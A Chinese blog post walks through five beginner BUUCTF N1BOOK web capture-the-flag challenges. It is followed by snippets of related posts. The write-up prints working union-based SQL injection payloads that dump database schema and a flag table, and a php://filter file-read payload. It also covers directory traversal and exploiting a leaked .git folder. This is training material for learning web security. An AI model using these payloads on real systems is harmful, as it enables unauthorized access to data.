BUUCTF-N1BOOK(web1)学习分享

已于 2023-11-17 15:17:33 修改
阅读量349 收藏 1
点赞数 2
文章标签: 网络安全 web安全
于 2023-11-17 15:16:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_63641882/article/details/134461499
版权
文章介绍了web入门中的安全问题,包括敏感文件泄漏、SQL注入攻击、GitHack工具利用、目录穿越和PHP伪协议。详细展示了如何通过各种技术手段获取flag并学习了相关知识点。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

[第一章 web入门]常见的搜集1

[第一章 web入门]粗心的小李1

[第一章 web入门]SQL注入-1 

[第一章 web入门]afr_1

 [第一章 web入门]afr_2

[第一章 web入门]常见的搜集1

 敏感文件泄漏使用工具进行目录扫描

访问得到一个txt文件的路径,访问得到半个flag

访问index.php~得到flag2

 访问.index.php.swp使用记事本打开得到flag3拼接起来就可以了

flag=n1book{info_1s_v3ry_imp0rtant_hack}

[第一章 web入门]粗心的小李1

 使用GitHack工具进行访问下载index.html文件

Githack下载:GitHub - lijiejie/GitHack: A `.git` folder disclosure exploit

 在本地访问index.html得到flag

flag=n1book{git_looks_s0_easyfun}

[第一章 web入门]SQL注入-1 

 

使用‘进行测试注入类型,发现有回显得知是字符型注入

在使用order by进行测试字段长度

id=1' order by 3 --+

 输入3产生回显,4没有回显 证明字段数为三位

使用联合语句进行查询数据库

id=-1' union select 1,databse(),3 --+

 得到数据库名note,进行查询数据表

?id=-1'union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema = database()--+

 发现flag字样的表进行查询表内的字段

?id=-1'union select 1,database(),group_concat(column_name) from information_schema.columns where table_name = 'fl4g'--+

 得到flag字段,进行查询字段值

?id=-1'union select 1,database(),group_concat(fllllag) from note.fl4g--+

得到flag

flag= n1book{union_select_is_so_cool}

[第一章 web入门]afr_1

使用php伪协议进行文件读取

?p=php://filter/read=convert.base64-encode/resource=flag

进行base64解码得到flag

 flag=n1book{afr_1_solved}

 [第一章 web入门]afr_2

 f12查看源码,有个img目录

进行目录穿越../得到根目录,得到flag

 flag=n1book{afr_2_solved}

考察知识点:

1.常见的备份文件,目录扫描

2.git文件泄漏和GitHack工具的使用

3.sql手工注入,联合查询

4.php伪协议的使用,目录穿越

红烧肉#
关注
[BUUCTF-N1BOOK]-【信息收集】[第一章 web入门]常见的搜集
羊柳树的博客
11-11 4013
项目场景: 提示:这里简述项目相关背景: 例如:项目场景:示例:通过蓝牙芯片(HC-05)与手机 APP 通信,每隔 5s 传输一批传感器数据(不是很大) 问题描述: 提示:这里描述项目中遇到的问题: 例如:数据传输过程中数据不时出现丢失的情况,偶尔会丢失一部分数据 APP 中接收数据代码: @Override public void run() { bytes = mmInStream.read(buffer); mHandler.obta
BuuCTF】N1BOOK1-4)
信安是不可或缺的一部分!
07-23 671
打开题目:看一下指纹信息:扫一下目录:这里并发有点大给个线程参数-t找到flag3。
buuctf[第一章 web入门]常见的搜集
weixin_52620919的博客
10-15 1378
进入题目: 御剑扫一下这个网址 可以得到以下三个路径返回正常robots.txt index.php~ .index.php.swp 然后依次进入这个链接 得到下一个提示:/flag1_is_her3_fun.txt 放到链接里 哎! flag露头了 然后换成index.php~ 得到flag的身体 链接后再拼接:.index.php.swq 得到一个文件 然后用记事本打开 得到flag的尾巴 然后拼一下 得到完整的flag n1book{info_1s_v3ry_imp0rtant_hack}
buuctf-[第一章 web入门]afr_2
最新发布
2301_81574836的博客
02-13 220
buuctf-[第一章 web入门]afr_2题解
[BUUCTF]-N1BOOK-[第一章 web入门]常见的搜集
yzl_007的博客
08-28 972
[BUUCTF]-N1BOOK-[第一章 web入门]常见的搜集 解题 打开地址后,提示敏感文件 访问robots.txt看看 然后访问这个txt文件 拿到一段flag index.php~查看拿到flag2 访问.index.php.swp拿到flag3 拼接后提交 n1book{info_1s_v3ry_imp0rtant_hack} 总结 常见的一些信息泄露和题解 https://blog.youkuaiyun.com/yzl_007/article/details/113444143 ...
[第一章 web入门]常见的搜集 1
qq_43618536的博客
07-04 2216
BUUCTF的[第一章 web入门]常见的搜集 1
2021-07-01-Buu刷题-web-[第一章 web入门]常见的搜集 1
yundi的博客
07-01 1288
2021-07-01-Buu刷题-web-[第一章 web入门]常见的搜集 1 #1登进去后的界面 #2用dirsearch目录扫描工具对该网址进行扫描 (前一篇文章记录了再Windows环境下如何安装和使用dirsearch https://blog.youkuaiyun.com/weixin_45926847/article/details/118381764?spm=1001.2014.3001.5502 ) 敲命令 python dirsearch.py -u URL -i 200 扫描网址对应返回状态为2
BUU-N1BOOK-Web
楼阁de猫的博客
12-11 1291
web入门[第一章 web入门]常见的信息搜集[第一章 web入门]粗心的小李 [第一章 web入门]常见的信息搜集 考查知识点: 1.常规文件:robots.txt 2.gedit备份文件 3.vim备份文件 首先看robots.txt: 访问一下这个文件得到flag1 再看一下原始文件ihdex.php,发现什么都没有,之前用dirsearch扫了很多东西出来,试了/.git发现也不对,这里就看到书上讲到了gedit备份文件,它是以 ~ 为后缀的,试试index.php~,有东西了,拿到flag
buuctf-ping
m0_62094846的博客
11-13 1230
要输入地址,第一反应127.0.0.1,试一试 应该是ping对了 网络查询ping:测试网络连接量的程序,可以确定本地主机能否与另一台主机成功连接,并确定参数等信息是否设置正确 ping命令用法: windowsping 在Windows系列的操作系统中,我们都可以使用ping命令来解决网络中出现的路由问题,方法如下 [5] : ①检查当前的IP配置。在Windows系统中使用ipconfig.exe检查IP配置。 ②在Windows系统中,ping命令允许在命令行中输入选...
WEB入门——SQL注入(一)
HasntStartIsOver的博客
06-03 1456
简单的SQL注入
[BUUCTF从零单排] Web方向 02.Web入门篇之『常见的搜集』解题思路(dirsearch工具详解)
杨秀璋的专栏
06-28 2046
前文介绍了Web方向的基础题目——粗心的小李,考察的是git泄露文件知识。这篇文章同样是Web方向的题目——常见的搜集,该题目主要考察信息收集知识,为了方便大家思考,文章摘要部分尽量少提,大家也可以先尝试实践,再看WriteUp。基础性文章,希望对您有所帮助,尤其是对网络安全工具的使用和理解。
BUUCTF N1BOOK [第一章 web入门]
Sk1y的博客
03-26 4386
sql盲注脚本 目录穿越 session伪造 源码泄露
BuuCTF之N1BOOK常见的搜集1
Yinger699的博客
09-28 766
信息收集题: 1、首先查看源码,看是否有什么重要的信息 2、发现没有重要信息,试试访问robots.txt 获得一个文件名,继续访问/flag1_is_her3_fun.txt flag只给了一部分,证明上一个回显的文件名,想要告诉我们的是,flag被分成了三部分。 3、使用dirsearch对网站进行扫描 获取到四个文件,其中robots.txt我们之前已经访问过了. /index.php/login 继续访问index.php~和.index.php.swp 获得第二部分的flag 访问.in.
BUUCTF--N1BOOK
m0_59022585的博客
07-09 1103
尝试注入'and updatexml(1,concat(0x7e,(seLect group_concat(table_name) from information_schema.tables where table_schema='note'),0x7e),1)#将select关键字绕过,成功回显出表(fl4g和users)。注入'and updatexml(1,concat(0x7e,(seLect group_concat(flag) from fl4g),0x7e),1)#回显出flag。
buuctf 常见的搜索
weixin_45711265的博客
01-07 523
buuctf N1book 好久不见,由于之前的博客号忘了,许久没有更新,新开一个重新开始 ok,作为回归的第一篇博客,看看最近新出的 buuctf N1book 第一题 常见的搜索 首先先用dirsearch扫一下 发现:.index.php.swp;robots.txt;index.php~; 访问robots.txt 发现flag1_is_her3_fun.txt 访问 flag1_is_her3_fun.txt 得到 flag1:n1book{info_1 访问index.php~得到 fla
buuctf web入门]常见的搜集
weixin_47174945的博客
05-11 934
1.通过御剑后台扫描工具 得到这个地址:http://bb12ee67-31db-4cc0-b3cc-c073c8fbc345.node3.buuoj.cn/robots.txt 将/flag1_is_her3_fun.txt拼接在连接后面 得到第一个flg 2.在后面拼接index.php~ 3,链接后在拼接 .index.php.swq 得到第三个flg 拼接得到flg n1book{info_1s_v3ry_imp0rtant_hack} ...
BUUCTF N1BOOK [第一章 web入门]常见的搜集1]
hivjianxian的博客
11-22 969
CTF题解
BUUCTF-N1BOOK-WP(1-3)
f1a9的博客
01-15 509
BUUCTF-n1book的WP,第一章详细解题步骤
[第一章 web入门]信息收集
carrot11223的博客
01-25 1040
第一章 web入门]信息收集常见的搜集:使用dirsearch进行目录扫描:http://641b1a56-4c8b-4b60-a33f-7af1a2b236a2.node5.buuoj.cn:81/存在robots.txt文件,该文件中主要用来记录哪些文件可以爬虫,哪些文件不可以爬虫,访问发现:访问泄露的路径发现:直接提交发现有问题:注意看到名称为flag1,估计还存在另一半信息叫flag2?于是我又开始在二级目录下扫描目录,可是仔细看这是个文本文件啊,咋可能文件下还有东西。
buuctf N1book
09-03
根据引用和引用的内容,"buuctf N1book"是一个flag,可以通过使用sqlmap来查看。首先,可以尝试使用sqlmap注入的方式来获取flag。根据引用[3]的内容,需要传入参数tip=1并抓包保存为post.txt文件。然后,使用命令...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值